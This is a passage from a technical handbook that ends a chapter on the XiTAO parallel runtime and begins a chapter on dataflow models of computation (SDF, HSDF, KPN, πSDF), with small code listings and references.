TAO) can be set explicitly or automatically using the internal performance modeling
which is activated by adding --perfmodel (-p) to the XiTAO configuration
options. XiTAO configuration parameters are described in section “Configuring the
Runtime”.
the XiTAO runtime will attempt to schedule the two tasks on the same set of cores.
This then optimistically results in data reuse via the caches of the cores. XiTAO
currently implements a one-dimensional virtual topology that is tested in one of its publicly available benchmarks (Heat).
[Fig. 3 shows a core/cache hierarchy – DRAM, LLCs, and L1s over cores C0–C7 – with elastic resource partitions of widths W = 4, W = 2, and W = 1, and a mapping of relative STA locations in the range 0.0–1.0 onto these partitions.]
Fig. 3 An example mapping of relative STA location to the elastic resource partitions
Listing 21 Basic structure of a DAG-based program inserting SPMD code regions (asynchronous
mode)
1 // tao_width: XiTAO specific resource hint
2 // i: the loop counter
3 // loop_start: loop iterator start
4 // loop_end: loop iterator end
5 // scheduling_type: XiTAO scheduler type (e.g. dynamic)
6 // block_length: the chunk size for each task
7
8  auto dataparallel_nodes =
9    __xitao_async_data_parallel_region
10     (tao_width, i, loop_start, loop_end,
11      scheduling_type, block_length,
12      for (int j = 0; j < N; j++) {
13        C[i][j] = 0;
14        for (int k = 0; k < N; k++)
15          C[i][j] += A[i][k] * B[k][j];
16      }
17   );
18 // previous_node: the parent node for the data parallel DAG
19 for (int i = 0; i < dataparallel_nodes.size(); ++i) {
20   previous_node->make_edge(dataparallel_nodes[i]);
21 }
22 // attach the data parallel nodes to the next dependency
23 for (int i = 0; i < dataparallel_nodes.size(); ++i) {
24   dataparallel_nodes[i]->make_edge(next_node);
25 }
Listing 22 Basic structure of a DAG-based program inserting SPMD code regions (synchronous
mode)
1 __xitao_sync_data_parallel_region(tao_width, i, loop_start,
2                                   loop_end, scheduling_type,
3                                   block_length,
4   for (int j = 0; j < N; j++) {
5     C[i][j] = 0;
6     for (int k = 0; k < N; k++) C[i][j] += A[i][k] * B[k][j];
7   }
8 );
Fig. 4 XiTAO data-parallel modes. (a) Asynchronous mode with fine-grained dependencies. (b)
Synchronous mode that is analogous to fork-join models
Table 2 The parameters input by the user to XiTAO’s asynchronous data-parallel interface

Parameter    Usage
width        The XiTAO resource hint to be given to the loop tasks.
iter         The loop index/iterator.
end          The loop end.
sched        The scheduling options (e.g., static, dynamic, energy-aware, etc.).
block_size   Governs the granularity of task creation.
First, the execution of previous nodes is synced. Second, the loop is divided into chunks of tasks
according to the block_length parameter. Third, an implicit wait is inserted to
pause the execution until all loop tasks have finished. Listing 22 shows an example
of such usage.
This section describes XiTAO runtime internals that are important for optimizations and for avoiding synchronization errors. The moldable task scheduler and queuing system are fully described in Pericàs (2018).
XiTAO Internals
An important design consideration in XiTAO is the queuing system and the
implementation of moldability. Figure 5 depicts a high-level view of the queuing
system. XiTAO maintains two queues for each core. TAOs first encounter the work
stealing queues (WSQ). These queues are similar to other work stealing runtimes
such as Cilk. The WSQs are used to balance the load across the cores. Note that
the WSQs are agnostic to moldability, i.e., they manage the TAOs as if they were
simple single-threaded tasks. Only upon selection of a ready TAO does the execution
take moldability into account. To this end, XiTAO implements a second set of
queues for each core, called Assembly Queues (AQ). The AQs are managed in
a strict FIFO policy. Upon selecting a ready TAO, the runtime allocates a set of
AQs corresponding to the subset of cores on which the TAO is to be executed
in a worksharing manner and inserts a reference to the TAO into each of these
queues. To avoid potential deadlock, locks to each AQ are taken before insertion
takes place, in order to make this operation look atomic. The cores then execute
the TAOs by extracting the TAO references from the AQ, one by one, and invoking
its execute() method. More details on XiTAO’s queuing system can be found
in Pericàs (2018).
This design has certain implications when programming TAOs. The first is that
TAOs can only synchronize internally. They should never attempt to synchronize
externally, as this would likely lead to a deadlock. This property makes TAOs look similar to CUDA thread blocks or OpenCL work groups. The second implication is
that the cost of inserting ready TAOs is proportional to the number of cores. Hence,
narrow TAOs are preferable when the application is composed of very fine-grained
tasks.
Execution of TAOs from the AQs does not imply a barrier at the start or finalization of each TAO. Hence, a large degree of asynchrony and overlapping is possible across different TAOs. However, whether this is beneficial depends very much on the characteristics of the application and on whether the TAOs are compute-bound, cache-bound, or memory-bound. A XiTAO compile-time option can be used to force barrier synchronization each time a TAO starts or finishes.
Conclusion
This chapter has provided an overview of the current practice for programming
parallel computing systems, with a focus on programming models targeting a
single node. Three models are introduced in detail: OpenMP, OmpSs, and XiTAO.
Acknowledgments This work has been developed with the support of the Spanish Ministry of
Science and Innovation (Computacion de Altas Prestaciones VIII: PID2019-107255GB). This
work has received funding from the European Union Horizon 2020 research and innovation
program under the LEGaTO project with grant agreement No. 780681 (https://legato-project.eu/).
This work is supported by the European Union’s Horizon 2020 research and innovation program
under the grant agreement No 754304 (DEEP-EST). This work has been done as part of the
European Processor Initiative project. The European Processor Initiative (EPI) (FPA: 800928) has
received funding from the European Union’s Horizon 2020 research and innovation program under grant agreement EPI-SGA1: 826647.
References
Blumofe RD, Joerg CF, Kuszmaul BC, Leiserson CE, Randall KH, Zhou Y (1995) Cilk: an efficient
multithreaded runtime system. In: Proceedings of the fifth ACM SIGPLAN symposium on
principles and practice of parallel programming, PPOPP’95, pp 207–216
Duran A, Perez JM, Ayguadé E, Badia RM, Labarta J (2008) Extending the OpenMP tasking model
to allow dependent tasks. In: Eigenmann R, de Supinski BR (eds) OpenMP in a new era of
parallelism. Springer, Berlin/Heidelberg, pp 111–122. ISBN 978-3-540-79561-2
Duran A, Ayguadé E, Badia RM, Labarta J, Martinell L, Martorell X, Planas J (2011) OmpSs: a
proposal for programming heterogeneous multi-core architectures. Parallel Process Lett 21(2):
173–193
Karrenberg R (2015) Automatic SIMD vectorization of SSA-based control flow graphs. Springer,
Wiesbaden
Kennedy K, Allen JR (2001) Optimizing compilers for modern architectures: a dependence-based
approach. Morgan Kaufmann Publishers Inc., San Francisco
Kurzak J, Ltaief H, Dongarra J, Badia RM (2010) Scheduling dense linear algebra operations on
multicore processors. Concurr Comput Pract Exp 22(1):15–44. ISSN 1532-0626
Larsen S, Amarasinghe S (2000) Exploiting superword level parallelism with multimedia
instruction sets. In: Proceedings of the ACM SIGPLAN 2000 conference on programming
language design and implementation, PLDI’00. Association for Computing Machinery, New
York, pp 145–156. ISBN 1581131992. https://doi.org/10.1145/349299.349320
Maroñas M (2021) On the design and development of programming models for exascale systems.
PhD thesis, Universitat Politècnica de Catalunya
Maroñas M, Sala K, Mateo S, Ayguadé E, Beltran V (2019) Worksharing tasks: an efficient way to
exploit irregular and fine-grained loop parallelism. In: 2019 IEEE 26th international conference
on high performance computing, data, and analytics (HiPC). IEEE, pp 383–394
Maroñas M, Teruel X, Bull M, Ayguade E, Beltran V (2020) Evaluating worksharing tasks
on distributed environments. In: 2020 IEEE international conference on cluster computing
(CLUSTER). IEEE. Pending publication
Maroñas M, Ayguadé E, Beltran V (2021) Mitigating the NUMA Effect on Task-Based Runtime
Systems. Submitted to the Journal of Supercomputing. ACM
OpenMP Architecture Review Board (1997) OpenMP Fortran Application Programming Interface
1.0. Accessed: 18 Feb 2021
OpenMP Architecture Review Board (1998) OpenMP C and C++ Application Programming
Interface 1.0. Accessed: 18 Feb 2021
OpenMP Architecture Review Board (2005) OpenMP Application Programming Interface 2.5.
Accessed: 18 Feb 2021
OpenMP Architecture Review Board (2008) OpenMP Application Programming Interface 3.0.
Accessed: 18 Feb 2021
OpenMP Architecture Review Board (2013) OpenMP Application Programming Interface 4.0.
Accessed: 18 Feb 2021
OpenMP Architecture Review Board (2020) OpenMP Application Programming Interface 5.1.
https://www.openmp.org/wp-content/uploads/OpenMP-API-Specification-5-1.pdf. Accessed:
18 Feb 2021
Pallares F, Mateo S, Beltran V, Ayguadé E (2019) Master Thesis: extending OmpSs-2 with flexible
task-based array reductions. https://upcommons.upc.edu/handle/2117/129246. Accessed: 01
Mar 2021
Perez JM, Beltran V, Labarta J, Ayguadé E (2017) Improving the integration of task nesting
and dependencies in OpenMP. In: 2017 IEEE international parallel and distributed processing
symposium (IPDPS). IEEE, pp 809–818
Pericàs M (2018) Elastic places: an adaptive resource manager for scalable and portable
performance. ACM Trans Archit Code Optim 15(2). ISSN 1544-3566. https://doi.org/10.
1145/3185458
RISC-V Community (2021) RISC-V vector extension intrinsic document. https://github.com/
riscv/rvv-intrinsic-doc. Accessed: 25 Feb 2021
Soomro PN, Abduljabbar M, Castrillon J, Pericás M (2021) An online guided tuning approach to
run CNN pipelines on edge devices. In: Proceedings of the 18th ACM international conference
on computing frontiers (CF’21), New York. Association for Computing Machinery (ACM)
pp 45–53. ISBN 9781450384049. https://doi.org/10.1145/3457388.3458662
Swamy H (2012) Structured parallel programming patterns for efficient computation by Michael McCool, Arch D. Robison and James Reinders. ACM SIGSOFT Softw Eng Notes 37:43. https://
doi.org/10.1145/2382756.2382773
The XiTAO development team (2021) XiTAO. https://github.com/CHART-Team/xitao.git.
Accessed: 26 Feb 2021
Dataflow Models of Computation for
Programming Heterogeneous Multicores 31
Jeronimo Castrillon, Karol Desnos, Andrés Goens,
and Christian Menard
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1108
About Models of Computation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1110
Dataflow Models of Computation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1112
Static Dataflow Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1112
Dynamic Dataflow MoCs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1120
Reconfigurable Dataflow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1122
Optimization of Dataflow Programs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1125
Modeling Heterogeneous Platforms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1126
Static Mapping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1129
Hybrid Mapping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1132
Examples: Models and Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1134
Dataflow in Commercial and Mainstream Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1134
MPSoC Application Programming Studio (MAPS) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1134
PREESM and SPIDER . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1137
Conclusion and Outlook . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1140
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1140
The work was carried out by Andrés Goens while at the Chair for Compiler Construction,
TU Dresden
Abstract
Keywords
Introduction
[Fig. 1a shows an FSM with states Park (initial), Reverse, and Drive; the transitions leaving Park are labeled “move backward” and “move forward”, and the remaining transitions are guarded by the conditions V = 0, V < 0, and V > 0. Fig. 1b shows the graphical semantics: state, initial state, and conditional transition.]
Fig. 1 Finite-State Machine (FSM) semantics and example. (a) Automatic transmission controller
FSM. (b) FSM semantics
Listing 1 C implementation
of the FSM from Fig. 1a
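Since the listing itself is not reproduced here, the following minimal C sketch (our reconstruction) illustrates such an implementation; it assumes the transitions suggested by Fig. 1a, with no direct edge between Drive and Reverse:

typedef enum { PARK, REVERSE, DRIVE } state_t;
typedef enum { CMD_NONE, CMD_BACKWARD, CMD_FORWARD } command_t;

/* One step of the controller: the next state depends only on the current
   state, the driver command, and the velocity V. */
state_t step(state_t s, command_t cmd, int v) {
    switch (s) {
    case PARK:
        if (cmd == CMD_BACKWARD) return REVERSE;
        if (cmd == CMD_FORWARD)  return DRIVE;
        return PARK;
    case REVERSE: return (v == 0) ? PARK : REVERSE;  /* never directly DRIVE */
    case DRIVE:   return (v == 0) ? PARK : DRIVE;    /* never directly REVERSE */
    }
    return s;
}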
Listing 2 VHDL
implementation of the FSM
from Fig. 1a
the construction of programs that are executed using one or several underlying
MoCs. For example, programs written in languages like Python or C are originally
intended to be executed on processors, while programs written in the Verilog
language are intended to be synthesized into logic circuits. The C or assembly
languages adopt the imperative MoC, while C++ or Java combine the imperative, object-oriented, and, to some extent, functional MoCs. A language can also be used to implement a
MoC not naturally implemented by its syntax, as illustrated in Fig. 1a.
The advantage of using a MoC to specify the behavior of a system is that in
return for abiding by the MoC semantics, key properties of the system can be
specified, guaranteed, and verified by construction. For example, in an FSM, all
possible transitions between states of the system are explicitly specified, and thus
no other transitions are possible. This is particularly useful to prevent unwanted or
harmful behavior when specifying a system, assuming the actual implementation
fully enforces the semantics of the MoC. The transmission controller in Fig. 1a, for
example, does not allow any transition between the Drive and Reverse states,
which would likely damage the controlled system. Guaranteeing such properties
from a system specification with a MoC is generally much simpler than verifying
them on the corresponding implementation with a programming language.
A plethora of MoCs have been created for diverse purposes. Some models, like
FSMs, are great to specify the behavior of control-oriented systems but do not
capture any concurrency and only very limited data processing. Other models, like
lambda calculus (Church 1985), focus on the specification of the computational part
of a system. This chapter focuses on a family of MoCs, namely, dataflow MoCs,
which is largely used for the specification of systems processing streams of data,
such as signals, videos, or images. The properties of the dataflow MoCs, detailed
in next sections, make them particularly suitable for implementation on modern
integrated circuit technologies. For more complete surveys of existing MoCs and
their properties, refer to Lee and Seshia (2016).
punched cards, the main objective of the BLODI language was to make computer
programming accessible to persons with no programming language knowledge. The
BLODI language was composed of a set of 30 primitive blocks, like adders, filters,
and quantizers, that could be used to compose Digital Signal Processing (DSP)
applications. In 1974, Kahn (1974) and Dennis (1974) independently created the
first mathematically grounded MoCs based on graphs, laying the foundation for the
dataflow MoCs family.
A common semantics of all dataflow MoCs is the specification of systems with directed graphs called dataflow graphs or process networks. A few elements found in this common dataflow semantics are:

• Actors: the vertices of the graph, which represent the computational entities of the system.
• FIFOs: the edges of the graph, which represent first-in, first-out communication channels between actors.
• Data tokens: the atomic units of data that actors produce and consume on the FIFOs connecting them.
The specification of the internal behavior of actors is not always an integral part
of the MoC semantics. Instead, dataflow MoCs generally specify a set of rules
which govern when actors are allowed to consume and produce a certain number
of tokens (Lee and Messerschmitt 1987).
The popularity of dataflow MoCs for the design of stream processing systems
notably comes from the assets they offer for deriving efficient implementations
on modern hardware and software technologies. Implementing efficient software
on modern hardware requires allocating processing, memory, communication,
and energy resources for each part of the system. By clearly exposing separate
computational entities, data movements, and computation triggers, dataflow MoCs
ease this implementation process. Another key advantage of dataflow MoCs is
their expressiveness for concurrent computations and data movement, which is an
essential feature for both hardware design and parallel software design (Ecker et al.
2009). Finally, dataflow MoCs have been the topic of many research works, and
many analysis and optimization techniques can be found in the literature, some of
which are presented in section “Optimization of Dataflow Programs”.
After this introduction to the basic concepts and advantages of dataflow MoCs,
the following sections present the semantics of a few of the most popular models.
[Fig. 2a shows an HSDF graph with actors A–G, including a self-loop FIFO with a delay on actor F; Fig. 2b shows the graphical semantics: actor, port, FIFO, and delay.]
Fig. 2 Homogeneous Synchronous Dataflow (HSDF) semantics and example. (a) HSDF graph
example. (b) HSDF graphical semantics
tokens consumed at this firing. The stateless property of HSDF actors enables the specification of data parallelism, that is, multiple firings of an actor can be triggered
in parallel if enough data tokens are available on its input FIFOs. Data parallelism
is a powerful feature of the HSDF MoC that enables specifying highly parallel
computations with graphs containing only a few actors. If an HSDF actor must
maintain an internal state containing useful data for future firings, this state must be
explicitly modeled in the graph with a self-loop FIFO (see (F, F ) in Fig. 2a). Such
a self-loop FIFO forces the firings of the enclosed actor to happen sequentially, thus losing all potential parallelism for this actor.
The HSDF MoC is particularly useful for designing stream processing appli-
cations running on Multi-Processor Systems-on-Chips (MPSoCs). For example,
deriving an implementation of an HSDF graph on a multicore target with a
shared memory requires solving two resource allocation problems: mapping and
scheduling as well as memory allocation.
Fig. 3 Schedules of the HSDF from Fig. 2a on two cores. (a) Non-overlapping iterations. (b)
Pipelining iterations
read from exactly once, the memory needed for allocating each FIFO corresponds
to the size of one data token transiting through it. This assumption holds only if
HSDF iterations are scheduled one at a time, which means that there are never two
overlapping iterations scheduled concurrently. To save memory resources in shared
memory MPSoCs, an address can be used to store several FIFOs, on the condition
that two FIFOs that store tokens simultaneously may not be allocated in overlapping
memory spaces (Desnos et al. 2015). For example, assuming that all tokens require
exactly one memory slot and that tokens produced and consumed by an actor never
exist simultaneously, the memory allocation presented in Fig. 4 can be derived for
the HSDF graph from Fig. 2a.
The HSDF MoC is similar to the task graphs that can be found in many
programming APIs, like OpenVX, DASK, or StarPU. In a task graph like in
the HSDF MoC, each vertex represents a task to execute, and edges represent
scheduling dependencies between tasks. Often, task graphs are more restrictive
than the HSDF MoC. For example, task graph APIs often require the graph to be
acyclic, model only scheduling dependencies with edges instead of capturing the
data transfers between tasks, or instantiate a task graph for a single execution instead
of several iterations.
The HSDF MoC was originally introduced as a sub-case of the SDF MoC, which
is presented in the next section.
[Fig. 5a shows an SDF graph with actors A–D: A produces 3 tokens per firing for B (which consumes 1) and 1 token for C; B produces 2 tokens for D (which consumes 3); C produces 4 tokens for D (which consumes 2) and has a self-loop FIFO carrying initial tokens. Fig. 5b shows the graphical semantics: actor, port and rate, FIFO, and delay with its number of tokens.]
Fig. 5 Synchronous Dataflow (SDF) example and semantics. (a) SDF graph example. (b) SDF
semantics
The only difference between the SDF and HSDF MoCs is that SDF actors may
consume and produce more than one data token on each port at each firing. As
illustrated in Fig. 5b, production and consumption rates are specified by an integer
value written next to the ports. As in HSDF, SDF execution is data driven, meaning
that an actor can fire as soon as it has at least as many tokens as specified by its
consumption rates. Hence, it may happen that the number of tokens available on a
FIFO is sufficient to trigger several firings of its consumer actor. An example of such
behavior can be observed in Fig. 5a where actor A produces enough data tokens at
each firing to trigger three firings of actor B.
Depending on the rates, the execution of some SDF graphs may always cause
an indefinite accumulation, or the starvation, of data tokens in one or several
FIFOs of the graph. An indispensable property for any valid system model is to
avoid this inconsistent behavior. The consistency of an SDF graph can be defined
mathematically by building its topology matrix.
The topology matrix associated with the SDF graph of Fig. 5a is presented
hereafter. The columns and rows of the matrix are labeled with the corresponding
actors and FIFOs, respectively.
\[
\Gamma = \bordermatrix{
                    & A & B  & C  & D  \cr
\overrightarrow{AB} & 3 & -1 & 0  & 0  \cr
\overrightarrow{AC} & 1 & 0  & -1 & 0  \cr
\overrightarrow{CC} & 0 & 0  & 0  & 0  \cr
\overrightarrow{BD} & 0 & 2  & 0  & -3 \cr
\overrightarrow{CD} & 0 & 0  & 4  & -2 \cr
}
\]
Note that Γ (CC, C) = 0, since actor C produces and consumes the same number
of tokens on its self-loop. In general, the production and consumption rates on
self-loop FIFOs should always be equal. Otherwise, tokens will either accumulate
indefinitely on this FIFO, or this FIFO will eventually cause a deadlock. In an SDF
graph, a deadlock occurs when the number of tokens in the FIFOs of the graph is not sufficient to enable any actor firing. Thus, an SDF graph G = ⟨A, F⟩ with topology matrix Γ is said to be consistent if and only if rank(Γ) = |A| − 1 (Theorem 1).
A proof for Theorem 1 can be found in Lee and Messerschmitt (1987). The
consistency of an SDF graph implies the existence of a repetition vector of size |A|.
The integer coefficients of a repetition vector give the minimal number of firings of
each actor to return the graph back to its original state. Executing an iteration of an
SDF graph consists of firing each actor of this graph as many times as given by the
repetition vector.
Computing the repetition vector q of a topology matrix Γ consists of finding a
positive integer vector that solves the following equation:
\[
\Gamma \cdot q = \begin{pmatrix} 0 & \cdots & 0 \end{pmatrix}^{T}
\]

The repetition vector for the SDF graph of Fig. 5a is \( q = \begin{pmatrix} 1 & 3 & 1 & 2 \end{pmatrix}^{T} \).
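As a quick check (this verification code is ours, not part of the chapter), one can confirm that this q solves the equation for the topology matrix above:

#include <stdio.h>

/* Topology matrix of the SDF graph in Fig. 5a: rows are the FIFOs
   AB, AC, CC, BD, CD; columns are the actors A, B, C, D. */
static const int topo[5][4] = {
    { 3, -1,  0,  0 },
    { 1,  0, -1,  0 },
    { 0,  0,  0,  0 },
    { 0,  2,  0, -3 },
    { 0,  0,  4, -2 },
};

int main(void) {
    const int q[4] = { 1, 3, 1, 2 };    /* candidate repetition vector */
    for (int f = 0; f < 5; f++) {       /* compute (Gamma . q)[f] */
        int sum = 0;
        for (int a = 0; a < 4; a++)
            sum += topo[f][a] * q[a];
        printf("row %d: %d\n", f, sum); /* all zeros: one consistent iteration */
    }
    return 0;
}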
The expressivity of the SDF MoC is equivalent to that of the HSDF model,
meaning that any system modeled with one of the two MoCs can also be modeled
with the other. This property is often exploited in order to derive an implementation
from an SDF graph first by transforming the SDF graph into an equivalent HSDF
graph (Pino et al. 1996) and then by using this HSDF graph to allocate computing
and memory resources, as seen in section “Homogeneous Synchronous Dataflow
(HSDF)”. For example, Fig. 6 presents an HSDF graph that is equivalent to the SDF
graph from Fig. 5a. This HSDF graph was obtained by duplicating each HSDF actor
by their number of repetitions from the computed repetition vector. The so-called
fork and join actors were introduced to distribute data from a unique producer actor
to several consumers and respectively to gather data from several producer actors to
a unique consumer. To complete the transformation, new data token types must be
used, which combine multiple tokens from the original SDF graph to a single token
in the HSDF graph.
[Fig. 6 shows the equivalent HSDF graph, with duplicated actors (e.g., B1–B3 and D1–D2) connected through the added Fork and Join actors.]
The popularity of the SDF MoC comes from its ability to capture task and data
parallelism, but also pipeline parallelism which can be explicitly specified using
delays (Lee and Messerschmitt 1987). The multi-rate capabilities of SDF actors are
also commonly used in signal processing applications for modeling functions with
different input and output sampling rates, such as downsamplers or upsamplers.
Finally, the static analyzability of the SDF MoC, and hence the possibility to map
and schedule it at compile time, is a great asset for developing any systems where
predictability is needed, such as real-time systems. The SDF MoC has been the topic
of many research works, resulting in many analysis and optimization techniques to
optimize their implementation both in hardware and software.
2D blocks, like raster scan, sawtooth scan, Z-order, or even with stencil-like consumption patterns (Keinert et al. 2005).
The HSDF and SDF MoCs, and all the aforementioned extensions, are static
models. In static models, the consumption and production rates of actors are known
at compile time and are independent of the value of data tokens at runtime. While
this restriction enables powerful analysis and optimizations at compile time, it limits
the expressivity of the models, preventing them from modeling data-dependent
behavior. The dataflow MoCs presented in the next section alleviates this restriction.
The primary difference between static and dynamic dataflow MoCs is that the
number of data tokens consumed and produced by actors is not known a priori
in a dynamic model. Hence, instead of fixed or periodic rates, a dynamic actor may change its exchange rates dynamically. Two of the most popular dynamic dataflow
MoCs, KPN and DPN, are presented in the following.
[Figure: a KPN example in which an Interleave process, with input ports in0 and in1 and an output port out, feeds a Downsample process with ports in and out.]
While this expressiveness makes the KPN Turing complete (Buck 1993), and hence capable of modeling more complex systems, it also makes the model non-decidable. A dataflow model is said to be
decidable if it is possible to derive a schedule for its computations at compile time.
In the case of KPN, deriving a schedule is infeasible, since the computation and data
exchange may depend on the value of data, which is known only at execution time.
An important characteristic of the KPN MoC is that, like the SDF MoC, it is
a deterministic model. A MoC is said to be deterministic if the behavior of the
controlled system, the history of tokens on every FIFO, and the outputs it produces
solely depend on the inputs given to the system, independently from external factors
such as time or randomness. In the KPN MoC, determinism is enforced by blocking
read operations on FIFOs (Kahn and MacQueen 1976). Once initiated by a process,
a read operation for N tokens will block the process in a waiting state until the
requested tokens become available in the FIFO. The input FIFOs of a process can
only be accessed using blocking reads, and it is not possible to peek at the number
of tokens in a FIFO before reading from it.
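To make these semantics concrete, the following sketch implements the Interleave process of the figure above in C, assuming hypothetical blocking fifo_read/fifo_write primitives (not a real API):

typedef int token_t;
typedef struct fifo fifo_t;                /* opaque channel type (assumed) */

token_t fifo_read(fifo_t *f);              /* blocks until a token arrives */
void    fifo_write(fifo_t *f, token_t t);

/* Blocking reads enforce a fixed alternation between in0 and in1, so the
   history of tokens on out depends only on the input histories, never on
   timing: the network is deterministic. */
void interleave(fifo_t *in0, fifo_t *in1, fifo_t *out) {
    for (;;) {
        fifo_write(out, fifo_read(in0));
        fifo_write(out, fifo_read(in1));
    }
}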
Reconfigurable Dataflow
π SDF
The semantics and a graph example of the Parameterized and Interfaced SDF
(π SDF) MoC are presented in Fig. 8. The π SDF semantics combine the semantics
of SDF, the hierarchy mechanism of the IBSDF MoC, and an explicit parameteriza-
tion tree with a reconfiguration mechanism (Desnos et al. 2013).
[Fig. 8a summarizes the π SDF semantics as the SDF semantics extended with hierarchy semantics (hierarchical actors, data input/output interfaces), parameterization semantics (locally static and configurable parameters, parameter dependencies, configuration input ports and interfaces), and reconfiguration semantics (configuration actors and configuration output ports). Fig. 8b shows a π SDF graph example with actors Read, SetN, Filter (containing an internal Kernel), and Send, parameterized by size and N.]
Fig. 8 Parameterized and Interfaced SDF (π SDF). (a) π SDF semantics. (b) π SDF graph example
In the π SDF MoC, each data port of a hierarchical actor is seen as a data
interface to its subgraph. The purpose of an interface-based hierarchy (Piat et al.
2009) is to isolate the nested levels of hierarchy in terms of graph consistency
analysis. In other words, the consistency of a hierarchy of graphs can be verified
by analyzing separately the consistency of each of the underlying SDF graphs. To
enable this compositionality, data interfaces automatically duplicate and discard
data tokens if, during a subgraph iteration, the number of tokens exchanged on
FIFOs connected to interfaces is greater than the number of tokens produced on
the corresponding data ports of the parent actor.
The parameterization semantics of the π SDF MoC consists of a set of param-
eters P and parameter dependencies, configuration input ports, and interfaces. A
parameter p ∈ P is a vertex of the π SDF graph associated with an integer valuation
function val : P → N. The value associated with a parameter is propagated through
explicit dependencies to other parameters and to actors which may use this value
in expressions specifying their own values, or rates of their dataflow ports. In the
π SDF MoC, it is possible to disable all firings of an actor by setting all its rates to
zero. As illustrated in Fig. 8b, parameter values can be propagated through multiple
levels of hierarchy using a configuration input port on a hierarchical actor and a
corresponding configuration input interface in the associated subgraph.
The reconfiguration semantics of the π SDF MoC is based on special con-
figuration actors. When fired, configuration actors are the only actors allowed to set new values for the configurable parameters of their graph.
The previous section discussed different dataflow MoCs and how their properties
make them highly useful to reason about the execution of a program. Tools can
thus leverage the information in the model to optimize a program so as to improve
its performance, energy efficiency, thermal dissipation, reliability or other execution
metrics, or combinations thereof (Marwedel et al. 2011). The functional model of an
application can also be extended to take constraints into account, like buffer sizing
or precedence enforced by the scheduler. Depending on the model, this allows tools
to reason about bounds on metrics while better reflecting the execution on the target
system. This section describes optimization flows for dataflow programs, mostly for
performance and energy efficiency. In particular, it explains different approaches
for mapping, which refers to an automated process that decides where to place the
elements of the model (nodes and edges) onto the target multicore. A mapping is
often thought to account for both a spatial and a temporal placement. A spatial
placement, for instance, specifies which core executes which node or which memory
holds which edge. A temporal placement or scheduling, in turn, specifies in which
order elements that share a resource should be executed.
Most optimization flows rely on models of the target multicore. After introducing
such models, the discussion turns to different model-based mapping approaches that
range from static or compile time to fully dynamic mapping at runtime. The terms
static and dynamic are aligned with the taxonomy in Lee and Ha (1989).
System-Level Description
Figure 9 shows a representative set of schematics of heterogeneous multicore SoCs.
The popular 8-core big.LITTLE architecture as found in boards such as the Odroid-
XU3/Odroid-XU4 (https://www.hardkernel.com/shop/odroid-xu4-special-price/) is
depicted in Fig. 9a. The big cores, for instance, a Cortex-A15, and the little cores, for
instance, a Cortex-A7, feature the same instruction set. In this case, heterogeneity
stems from the different performance of the cores as a result of a different
micro-architecture and clock frequency. The more recent DynamIQ technology
from ARM allows integrating heterogeneous micro-architectures in a more flexible
interconnect. Figure 9b shows the schematic of the Texas Instruments (TI) Keystone
II architecture (Biscondi et al. 2012), integrating ARM cores and TI Very Large
Instruction Word (VLIW) cores for digital signal processing. Mesh-based or tiled
architectures can (cf. Fig. 9c) also be found in the market, like the coherent Neoverse
N1 mesh from ARM (Pellegrini et al. 2020) or the Coolidge MPPA 2D torus from
Kalray (de Dinechin 2015). These architectures use Networks-on-Chip (NoCs) as
interconnect. For mapping optimization, tools use a description of topologies such
as those shown in Fig. 9. This is usually implemented with ad hoc markup languages
that describe the interconnect, the types of cores, and the memory subsystem. The
level of detail varies from a pure schematic description, like in Sesame (Pimentel
et al. 2006), the Distributed-Object Layer (DOL) approach (Thiele et al. 2007),
the S-LAM model (Pelcat et al. 2009), or Turnus (Brunet et al. 2013) to a deep
modeling that includes the instructions and micro-architectural details of each of
the cores (Eusse et al. 2013; C/DA Design Automation 2020).
Fig. 9 Schematics of heterogeneous multicores. (a) ARM big.LITTLE. (b) TI Keystone II. (c) ARM CMN-600
Apart from the pure architectural description, tools for dataflow mapping have to
understand the cost of the runtime environment that enforces the dataflow semantics.
This includes possible communication primitives that can be used to implement
the message-passing FIFO semantics of the high-level model. Some mapping tools
can use these models to automatically select the best matching communication
API in conjunction with the actor mapping (Castrillon et al. 2012). Similarly,
information about multi-tasking or threading support, per-core scheduling policies,
and associated costs is often modeled.
The effort on several such system-level modeling initiatives, including those
of the MCA (The Multicore Association, Inc 2015) and the MPSoC Application
Programming Studio (MAPS) project (Leupers et al. 2017), led to the recent IEEE
2804-2019 Standard for Software-Hardware Interface for Multi-Many-Core (C/DA
Design Automation 2020). The standard defines an XML format to represent
complex architectures, focusing on the information needed to evaluate the execution
of software on them. This includes detailed information about cores (including VLIW),
memory address spaces, caches, scratchpad memories, interconnection links, as well
as communication and synchronization primitives. The more abstract system-level
model used by Mocasin (Menard et al. 2021) is shown in Fig. 10 as an example. With
a simple Python syntax, shown on the left side of the figure, a short script produces
a model topology that corresponds to the ARM big.LITTLE system of Fig. 9a.
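As an illustration of such Python-embedded descriptions, the sketch below builds a big.LITTLE-like topology. The API is hypothetical, not Mocasin's actual syntax, and the frequencies and bandwidth are assumptions for the Odroid-class boards mentioned above.

    # Hypothetical system-level description API (not Mocasin's actual one).
    class Platform:
        def __init__(self):
            self.cores, self.links = [], []
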